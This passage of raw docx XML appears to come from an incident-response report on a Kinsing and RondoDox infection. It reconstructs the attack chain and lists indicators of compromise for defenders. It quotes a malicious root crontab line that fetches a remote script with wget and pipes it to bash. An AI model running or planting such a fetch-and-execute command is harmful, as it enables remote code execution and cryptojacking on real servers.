        <w:t xml:space="preserve">UPX unpacking on the server was attempted but the Ghidra analysis of the unpacked binary timed out. The packed binary's UPX stub provides limited insight; full XMRig decompilation would require offline unpacking and re-analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Attack Chain Reconstruction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on all evidence — forensic artifacts, Ghidra decompilation, strings analysis, and process data:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Initial Access (circa March 11, 2026)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache ActiveMQ exploitation (CVE-2023-46604)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing process environment shows: MB_SITE_URL="https://agricultureintech[.]net/analytics/" nohup java -jar metabase.jar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Metabase runs on the Java stack that includes ActiveMQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing Go symbols include main.runTaskWithHttp targeting HTTP-based exploits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Kinsing Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing binary deployed to /etc/data/kinsing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lock file created at /run/lock/linux.lock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UUID generated for bot identification (main.getOrCreateUuid)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 communication established with 185.61.7[.]8 (primary)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">System reconnaissance: IP discovery via api.ipify.org, CPU enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Persistence Installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Root crontab installed (March 19): * * * * * wget http://80.64.16[.]241/mt.sh | bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ld.so.preload rootkit deployed (libsystem.so) — later removed by security team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Original binary deleted from disk — continues running from memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Miner Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">kdevtmpfsi (UPX-packed XMRig) downloaded to /tmp/kdevtmpfsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup created at /tmp/kdevtmpfsi.bak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mining initiated: 4 threads, connecting to 185.221.152[.]130:443</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">main.minerRunningCheck ensures continuous operation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 5: Lateral Movement &amp; Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"firewire" (masscan) deployed for network scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis brute-force (main.redisBrute) launched against discovered targets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Competition elimination via main.killer family</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy established for C2 pivoting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 6: RondoDox Deployment (Separate Infection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RondoDox botnet binary deployed to /root/rondo_dump.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-debug watchdog forked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 registration with 45.92.1[.]50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DDoS capabilities activated (awaiting C2 commands)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH propagation attempted against internal/external targets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Consolidated Indicators of Compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Network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Indicator</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Context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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">45.92.1[.]50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IP</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RondoDox C2 server</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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">185.61.7[.]8</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IP</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Kinsing primary C2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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">67.205.161[.]58</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IP</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Kinsing secondary C2</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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">104.248.3[.]165</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IP</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Kinsing tertiary C2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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">47.65.90[.]240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IP</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Kinsing quaternary C2</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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">80.64.16[.]241</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IP</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Kinsing cron script delivery server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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">185.221.152[.]130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IP</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XMRig mining pool proxy</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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">http://80.64.16[.]241/mt.sh</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URL</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Persistence script (cron)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">File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SHA-256</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Filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7d69ffa881ca2953defe4fb5320c7d007d81713ac22e1dbcf77221fdc4d2c67e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rondo_dump.bin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c</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kinsing.bak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6fc94d8aecc538b1d099a429fb68ac20d7b6ae8b3c7795ae72dd2b7107690b8f</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kdevtmpfsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">File System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Path</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Indicator Type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/etc/data/kinsing*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Kinsing binary location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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/tmp/kdevtmpfsi*</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XMRig miner location</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/dev/shm/kdevtmpfsi</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Alternative miner location (shared memory)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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/run/lock/linux.lock</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Kinsing lock file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/tmp/kinsing.bin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Kinsing marker file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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/etc/ld.so.preload (with libsystem.so)</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Rootkit indicator</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firewire / firewire.sh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Masscan scanning tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Behavioral Indicators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron job executing wget | bash every minute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Process named kdevtmpfsi consuming 400%+ CPU</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">top/htop being killed immediately when launched interactively</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Outbound connections to port 443 on non-standard IPs (mining)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary files deleted from disk but running from /proc/[pid]/exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lock file at /run/lock/linux.lock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
